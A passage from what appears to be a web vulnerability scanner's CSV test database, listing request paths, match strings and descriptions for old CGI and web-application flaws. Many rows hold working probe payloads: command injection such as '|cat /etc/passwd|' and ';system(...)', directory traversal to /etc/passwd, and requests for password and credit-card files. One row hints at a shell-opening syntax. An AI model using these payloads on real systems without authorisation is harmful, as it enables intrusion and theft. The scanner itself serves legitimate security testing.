userid\",\"\",\"\",\"\",\"\",\"cgiwrap can be used to enumerate user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.\",\"\",\"\"\n\"000965\",\"0\",\"3\",\"@CGIDIRScgiwrap/~JUNK(5)\",\"GET\",\" unable to find the user\",\"\",\"\",\"\",\"\",\"Based on error message, cgiwrap can likely be used to find valid user accounts. Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.\",\"\",\"\"\n\"000966\",\"0\",\"3\",\"@CGIDIRScgiwrap/~root\",\"GET\",\"UID of script userid\",\"\",\"\",\"\",\"\",\"cgiwrap can be used to enumerate user accounts.  Recompile cgiwrap with the '--with-quiet-errors' option to stop user enumeration.\",\"\",\"\"\n\"000967\",\"0\",\"3\",\"@CGIDIRSdbman/db.cgi?db=no-db\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows remote attackers to view system information.\",\"\",\"\"\n\"000968\",\"17111\",\"3\",\"@CGIDIRSdcshop/auth_data/auth_user_file.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000969\",\"17111\",\"3\",\"@CGIDIRSDCShop/auth_data/auth_user_file.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000970\",\"596\",\"3\",\"@CGIDIRSdcshop/orders/orders.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000971\",\"596\",\"3\",\"@CGIDIRSDCShop/orders/orders.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000972\",\"0\",\"3\",\"@CGIDIRSdumpenv.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI gives a lot of information to attackers.\",\"\",\"\"\n\"000973\",\"89\",\"3\",\"@CGIDIRShtsearch?-c/nonexistant\",\"GET\",\"Unable to read configuration file '\\/nonexistant'\",\"\",\"\",\"\",\"\",\"The ht::/Dig install may let an attacker force ht://Dig to read arbitrary config files for itself.\",\"\",\"\"\n\"000974\",\"0\",\"3\",\"@CGIDIRSmkilog.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI can give an attacker a lot of information.\",\"\",\"\"\n\"000975\",\"0\",\"3\",\"@CGIDIRSmkplog.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI can give an attacker a lot of information.\",\"\",\"\"\n\"000976\",\"596\",\"3\",\"@CGIDIRSorders/orders.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000977\",\"0\",\"3\",\"@CGIDIRSprocessit.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI returns environment variables, giving attackers valuable information.\",\"\",\"\"\n\"000978\",\"0\",\"3\",\"@CGIDIRSrpm_query\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows anyone to see the installed RPMs\",\"\",\"\"\n\"000979\",\"0\",\"3\",\"@CGIDIRSsawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\",\"GET\",\"Unknown configuration\",\"\",\"\",\"\",\"\",\"The Sawmill CGI allows attackers to read the Sawmill password.\",\"\",\"\"\n\"000980\",\"17111\",\"3\",\"@CGIDIRSshop/auth_data/auth_user_file.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000981\",\"596\",\"3\",\"@CGIDIRSshop/orders/orders.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.\",\"\",\"\"\n\"000982\",\"0\",\"3\",\"@CGIDIRSws_ftp.ini\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can contain saved passwords for ftp sites\",\"\",\"\"\n\"000983\",\"0\",\"3\",\"@CGIDIRSWS_FTP.ini\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can contain saved passwords for ftp sites\",\"\",\"\"\n\"000984\",\"713\",\"3\",\"/?sql_debug=1\",\"GET\",\"SQL query: \",\"\",\"\",\"\",\"\",\"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.\",\"\",\"\"\n\"000985\",\"0\",\"3\",\"/a_security.htm\",\"GET\",\"name=\\\"viewingpasswrd\\\" value=\",\"\",\"\",\"\",\"\",\"Polycom ViewStation FX Release v4.2 reveals the admin password in the change password form's HTML.\",\"\",\"\"\n\"000986\",\"0\",\"3\",\"/Admin_files/order.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt.\",\"\",\"\"\n\"000987\",\"59092\",\"3e\",\"/admin.html\",\"GET\",\"MySimpleNews - Administration\",\"\",\"\",\"\",\"\",\"MySimpleNews contains the admin password in the login page HTML.\",\"\",\"\"\n\"000988\",\"0\",\"3\",\"/admin/cplogfile.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.\",\"\",\"\"\n\"000989\",\"0\",\"3\",\"/admin/system_footer.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"myphpnuke version 1.8.8_final_7 reveals detailed system information.\",\"\",\"\"\n\"000990\",\"0\",\"3\",\"/cfdocs/snippets/fileexists.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can be used to verify the existence of files (on the same drive info as the web tree/file)\",\"\",\"\"\n\"000991\",\"0\",\"3\",\"/cgi-bin/MachineInfo\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Gives out information on the machine (IRIX), including hostname\",\"\",\"\"\n\"000992\",\"59646\",\"3\",\"/chat/!nicks.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WF-Chat 1.0 Beta allows retrieval of user information.\",\"\",\"\"\n\"000993\",\"59645\",\"3\",\"/chat/!pwds.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WF-Chat 1.0 Beta allows retrieval of user information.\",\"\",\"\"\n\"000994\",\"53304\",\"3\",\"/chat/data/usr\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SimpleChat! 1.3 allows retrieval of user information.\",\"\",\"\"\n\"000995\",\"0\",\"3\",\"/com\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Java class files may be browsable.\",\"\",\"\"\n\"000996\",\"0\",\"3\",\"/COM\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Java class files may be browsable.\",\"\",\"\"\n\"000997\",\"0\",\"3\",\"/config.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PHP Config file may contain database IDs and passwords.\",\"\",\"\"\n\"000998\",\"0\",\"3\",\"/config/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Configuration information may be available remotely.\",\"\",\"\"\n\"000999\",\"0\",\"3\",\"/cplogfile.log\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.\",\"\",\"\"\n\"001000\",\"2880\",\"3\",\"/cutenews/index.php?debug\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"Cutenews 1.3 contains an information disclosure bug that reveals standard 'phpinfo' page output.\",\"\",\"\"\n\"001001\",\"0\",\"3\",\"/examples/jsp/snp/anything.snp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Tomcat servlet gives lots of host information.\",\"\",\"\"\n\"001002\",\"0\",\"3\",\"/file-that-is-not-real-2002.php3\",\"GET\",\"Unable to open\",\"\",\"\",\"\",\"\",\"PHP is configured to show the web root when sending error messages. Set display_errors to 'off'.\",\"\",\"\"\n\"001003\",\"0\",\"3\",\"/index.php?sql_debug=1\",\"GET\",\"SQL query: \",\"\",\"\",\"\",\"\",\"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.\",\"\",\"\"\n\"001004\",\"0\",\"37\",\"@CGIDIRSview-source?view-source\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This allows remote users to view source code.\",\"\",\"\"\n\"001005\",\"0\",\"37\",\"@CGIDIRSwebplus?about\",\"GET\",\"Product Information\",\"\",\"\",\"\",\"\",\"Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability.\",\"\",\"\"\n\"001006\",\"0\",\"37\",\"/cfdocs/snippets/viewexample.cfm\",\"GET\",\"200\",\"\",\"not found\",\"\",\"\",\"This can be used to view .cfm files, request viewexample.cfm?Tagname=..\\..\\..\\file  (.cfm is assumed)\",\"\",\"\"\n\"001007\",\"0\",\"3a\",\"/chassis/config/GeneralChassisConfig.html\",\"GET\",\"Chassis Configuration\",\"\",\"\",\"\",\"\",\"The Cabletron switch may allow remote configuration, or data retrieval, through the web interface.\",\"\",\"\"\n\"001008\",\"13978\",\"3b\",\"@CGIDIRSibill.pm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"iBill.pm is installed. This may allow brute forcing of passwords.\",\"\",\"\"\n\"001009\",\"9332\",\"3b\",\"@CGIDIRSscoadminreg.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.\",\"\",\"\"\n\"001010\",\"4663\",\"3b\",\"@CGIDIRSSGB_DIR/superguestconfig\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.\",\"\",\"\"\n\"001011\",\"0\",\"4\",\"/hp/device/this.LCDispatcher\",\"GET\",\"Printer Serial Number\",\"\",\"\",\"\",\"\",\"The Hewlett Packard Color LaserJet 4550 may allow unauthenticated users to permanently include links (and other data) in the web interface.\",\"\",\"\"\n\"001012\",\"0\",\"6\",\"/cfdocs/snippets/evaluate.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info\",\"\",\"\"\n\"001013\",\"0\",\"6\",\"/cfide/Administrator/startstop.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can start/stop the server\",\"\",\"\"\n\"001014\",\"0\",\"7\",\"@CGIDIRSicat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.\",\"\",\"\"\n\"001015\",\"11871\",\"7\",\"@CGIDIRSMsmMask.exe?mask=/junk334\",\"GET\",\"Failed to read the maskfile\",\"\",\"\",\"\",\"\",\"MondoSearch may allow any file to be retrieved using the 'mask' variable.\",\"\",\"\"\n\"001016\",\"11871\",\"7\",\"@CGIDIRSMsmMask.exe?mask=/junk334\",\"GET\",\"MondoSearch for Web Sites 4\\.0\",\"\",\"\",\"\",\"\",\"MondoSearch may allow any file to be retrieved using the 'mask' variable.\",\"\",\"\"\n\"001017\",\"11871\",\"7\",\"@CGIDIRSMsmMask.exe?mask=/junk334\",\"GET\",\"MondoSearch for Web Sites 4\\.1\",\"\",\"\",\"\",\"\",\"MondoSearch may allow any file to be retrieved using the 'mask' variable.\",\"\",\"\"\n\"001018\",\"11871\",\"7\",\"@CGIDIRSMsmMask.exe?mask=/junk334\",\"GET\",\"MondoSearch for Web Sites 4\\.2\",\"\",\"\",\"\",\"\",\"MondoSearch may allow any file to be retrieved using the 'mask' variable.\",\"\",\"\"\n\"001019\",\"11871\",\"7\",\"@CGIDIRSMsmMask.exe?mask=/junk334\",\"GET\",\"MondoSearch for Web Sites 4\\.3\",\"\",\"\",\"\",\"\",\"MondoSearch may allow any file to be retrieved using the 'mask' variable.\",\"\",\"\"\n\"001020\",\"0\",\"7\",\"@CGIDIRSnph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug\",\"\",\"\"\n\"001021\",\"0\",\"7\",\"@CGIDIRSquery?mss=%2e%2e/config\",\"GET\",\"MGMT_PW\",\"\",\"\",\"\",\"\",\"The Altavista search service allows attackers to read any file on the server.\",\"\",\"\"\n\"001022\",\"0\",\"7\",\"@CGIDIRStest-cgi?/*\",\"GET\",\"\\/tmp\",\"\",\"\",\"\",\"\",\"This CGI allows files to read remotely.\",\"\",\"\"\n\"001023\",\"6192\",\"7\",\"@CGIDIRSupdate.dpgs\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Duma Photo Gallery System may allow remote users to write to any file on the system. See http://b0iler.eyeonsecurity.net for details. This could not be remotely tested.\",\"\",\"\"\n\"001024\",\"0\",\"7\",\"@CGIDIRSview-source\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow remote arbitrary file retrieval.\",\"\",\"\"\n\"001025\",\"0\",\"7\",\"@CGIDIRSwrap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI lets users read any file with 755 perms. It should not be in the CGI directory.\",\"\",\"\"\n\"001026\",\"0\",\"7\",\"/Mem/dynaform/FileExplorer.htm\",\"GET\",\"File Explorer\",\"\",\"\",\"\",\"\",\"The Nortel MIRAN device allows unauthenticated users to view the contents of the system's drive.\",\"\",\"\"\n\"001027\",\"0\",\"78\",\"@CGIDIRSFormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to read files and execute commands remotely.\",\"\",\"\"\n\"001028\",\"0\",\"78\",\"@CGIDIRSlastlines.cgi?process\",\"POST\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI lets attackers read arbitrary files and/or execute commands.\",\"num_lines=1000&log_location=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\",\"\"\n\"001029\",\"405\",\"8\",\"@CGIDIRScalendar_admin.pl?config=|cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands on the server.\",\"\",\"\"\n\"001030\",\"405\",\"8\",\"@CGIDIRScalendar/calendar_admin.pl?config=|cat%20/etc/passwd|\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands on the server.\",\"\",\"\"\n\"001031\",\"29\",\"8\",\"@CGIDIRScampas?%0acat%0a/etc/passwd%0a\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"NCSA campas allows attackers to execute commands on the server.\",\"\",\"\"\n\"001032\",\"650\",\"8\",\"@CGIDIRScgicso?query=AAA\",\"GET\",\"400 Required field missing: fingerhost\",\"\",\"\",\"\",\"\",\"CGIEmail's cgicso allows attackers to execute remote commands.\",\"\",\"\"\n\"001033\",\"0\",\"8\",\"@CGIDIRScgiwrap\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of cgiwrap allow anyone to execute commands remotely.\",\"\",\"\"\n\"001034\",\"640\",\"8\",\"@CGIDIRScommon/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|\",\"GET\",\"resolv\\.conf\",\"\",\"\",\"\",\"\",\"Allows attacker to execute commands as http daemon. Upgrade or remove.\",\"\",\"\"\n\"001035\",\"0\",\"8\",\"@CGIDIRSCount.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This may allow attackers to execute arbitrary commands on the server\",\"\",\"\"\n\"001036\",\"59544\",\"8\",\"@CGIDIRScsChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001037\",\"59542\",\"8\",\"@CGIDIRScsGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001038\",\"59543\",\"8\",\"@CGIDIRScsLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001039\",\"59545\",\"8\",\"@CGIDIRScsNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.\",\"\",\"\"\n\"001040\",\"0\",\"8\",\"@CGIDIRSecho.bat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to execute remote commands.\",\"\",\"\"\n\"001041\",\"0\",\"8\",\"@CGIDIRSformmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to retrieve arbitrary files from the server.\",\"\",\"\"\n\"001042\",\"4571\",\"8\",\"@CGIDIRSImageFolio/admin/admin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"ImageFolio (default account Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/\",\"\",\"\"\n\"001043\",\"101\",\"8\",\"@CGIDIRSinfo2www '(../../../../../../../bin/mail root </etc/passwd>\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands. passwd file may have been mailed to root.\",\"\",\"\"\n\"001044\",\"0\",\"8\",\"@CGIDIRSinfo2www\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands.\",\"\",\"\"\n\"001045\",\"0\",\"8\",\"@CGIDIRSinfosrch.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands.\",\"\",\"\"\n\"001046\",\"0\",\"8\",\"@CGIDIRSlistrec.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands on the host.\",\"\",\"\"\n\"001047\",\"0\",\"8\",\"@CGIDIRSmailnews.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions allow attacker to execute commands as http daemon. Upgrade or remove.\",\"\",\"\"\n\"001048\",\"0\",\"8\",\"@CGIDIRSmmstdod.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.\",\"\",\"\"\n\"001049\",\"0\",\"8\",\"@CGIDIRSpagelog.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.\",\"\",\"\"\n\"001050\",\"0\",\"8\",\"@CGIDIRSperl?-v\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.\",\"\",\"\"\n\"001051\",\"0\",\"8\",\"@CGIDIRSperl.exe?-v\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.\",\"\",\"\"\n\"001052\",\"0\",\"8\",\"@CGIDIRSperl.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.\",\"\",\"\"\n\"001053\",\"0\",\"8\",\"@CGIDIRSperl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.\",\"\",\"\"\n\"001054\",\"0\",\"8\",\"@CGIDIRSplusmail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to execute commands remotely.\",\"\",\"\"\n\"001055\",\"10944\",\"8\",\"@CGIDIRSscripts/slxweb.dll/getfile?type=Library&file=invalidfilename\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"SalesLogix WebClient may allow attackers to execute arbitrary commands on the host. See http://www.securityfocus.com/archive/1/378637\",\"\",\"\"\n\"001056\",\"0\",\"8\",\"@CGIDIRSsmartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|\",\"GET\",\"200\",\"root:\",\"\",\"\",\"\",\"To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command\",\"\",\"\"\n\"001057\",\"0\",\"8\",\"@CGIDIRSsmartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|\",\"GET\",\"200\",\"root:\",\"\",\"\",\"\",\"To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command\",\"\",\"\"\n\"001058\",\"54034\",\"8\",\"@CGIDIRSspin_client.cgi?aaaaaaaa\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)\",\"\",\"\"\n\"001059\",\"10598\",\"8\",\"@CGIDIRSsscd_suncourier.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.\",\"\",\"\"\n\"001060\",\"13981\",\"8\",\"@CGIDIRSviralator.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.\",\"\",\"\"\n\"001061\",\"4854\",\"8\",\"@CGIDIRSvirgil.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.\",\"\",\"\"\n\"001062\",\"2088\",\"8\",\"@CGIDIRSvpasswd.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.\",\"\",\"\"\n\"001063\",\"236\",\"8\",\"@CGIDIRSwebgais\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The webgais allows attackers to execute commands.\",\"\",\"\"\n\"001064\",\"237\",\"8\",\"@CGIDIRSwebsendmail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to execute arbitrary commands remotely.\",\"\",\"\"\n\"001065\",\"0\",\"8\",\"@CGIDIRSwhois.cgi?action=load&whois=%3Bid\",\"GET\",\"uid=\",\"\",\"\",\"\",\"\",\"This script allows commands to be executed remotely.\",\"\",\"\"\n\"001066\",\"0\",\"8\",\"@CGIDIRSwwwwais\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.\",\"\",\"\"\n\"001067\",\"10598\",\"8\",\"/cd-cgi/sscd_suncourier.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.\",\"\",\"\"\n\"001068\",\"0\",\"8\",\"@CGIDIRScommon/listrec.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute commands on the host.\",\"\",\"\"\n\"001069\",\"0\",\"8\",\"/cgi-bin/handler\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands\",\"\",\"\"\n\"001070\",\"0\",\"8\",\"/cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands\",\"\",\"\"\n\"001071\",\"235\",\"8\",\"/cgi-bin/webdist.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands\",\"\",\"\"\n\"001072\",\"14485\",\"8\",\"/DB4Web/10.10.10.10:100\",\"GET\",\"connect\\(\\)\",\"\",\"\",\"\",\"\",\"The remote DB4Web server may allow you to connect to arbitrary machines and ports.\",\"\",\"\"\n\"001073\",\"55\",\"8\",\"/ews/ews/architext_query.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665.\",\"\",\"\"\n\"001074\",\"0\",\"8\",\"/exec/show/config/cr\",\"GET\",\"http>Configure\",\"\",\"\",\"\",\"\",\"The Cisco router's web install allows arbitrary commands to be executed remotely.\",\"\",\"\"\n\"001075\",\"5280\",\"8\",\"/instantwebmail/message.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.\",\"\",\"\"\n\"001076\",\"0\",\"38\",\"/cfdocs/snippets/gettempdirectory.cfm\",\"GET\",\"200\",\"\",\"not found\",\"\",\"\",\"Depending on install, creates files, gives you physical drive info, sometimes defaults to \\winnt\\ directory as temp directory\",\"\",\"\"\n\"001077\",\"59031\",\"48\",\"@CGIDIRSstat.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.\",\"\",\"\"\n\"001078\",\"28\",\"a\",\"@CGIDIRScachemgr.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.\",\"\",\"\"\n\"001079\",\"142\",\"a\",\"@CGIDIRSppdscgi.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"PowerPlay Web Edition may allow unauthenticated users to view pages.\",\"\",\"\"\n\"001080\",\"0\",\"ae\",\"@CGIDIRSsws/admin.html\",\"GET\",\"manager\\.pl\",\"\",\"\",\"\",\"\",\"Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication.\",\"\",\"\"\n\"001081\",\"0\",\"ae\",\"@CGIDIRSwebif.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.\",\"\",\"\"\n\"001082\",\"29786\",\"ae\",\"/admin.php?en_log_id=0&action=config\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.\",\"\",\"\"\n\"001083\",\"29786\",\"ae\",\"/admin.php?en_log_id=0&action=users\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.\",\"\",\"\"\n\"001084\",\"0\",\"ae\",\"/admin.php4?reg_login=1\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.\",\"\",\"\"\n\"001085\",\"3233\",\"ae\",\"/admin/admin_phpinfo.php4\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.\",\"\",\"\"\n\"001086\",\"5034\",\"a\",\"/admin/login.php?action=insert&username=test&password=test\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.\",\"\",\"\"\n\"001087\",\"0\",\"a\",\"@CGIDIRS.cobalt/siteUserMod/siteUserMod.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Older versions of this CGI allow any user to change the administrator password.\",\"\",\"\"\n\"001088\",\"607\",\"a\",\"/interscan/cgi-bin/FtpSave.dll?I'm%20Here\",\"GET\",\"These settings have been saved\",\"\",\"\",\"\",\"\",\"Multiple files in the Interscan management server allow attackers to change settings without auth. Upgrade to the latest version of the Interscan product.\",\"\",\"\"\n\"001089\",\"8610\",\"7a\",\"/ext.ini.%00.txt\",\"GET\",\"\\[SERVICES\\]\",\"\",\"\",\"\",\"\",\"BadBlue allows access restrictions to be bypassed by using a null byte.\",\"\",\"\"\n\"001090\",\"0\",\"8a\",\"@CGIDIRSwebdriver\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI often allows anyone to access the Informix DB on the host.\",\"\",\"\"\n\"001091\",\"5178\",\"8a\",\"/dostuff.php?action=modify_user\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/\",\"\",\"\"\n\"001092\",\"0\",\"ab\",\"@CGIDIRSc32web.exe/ChangeAdminPassword\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may contain a backdoor and may allow attackers 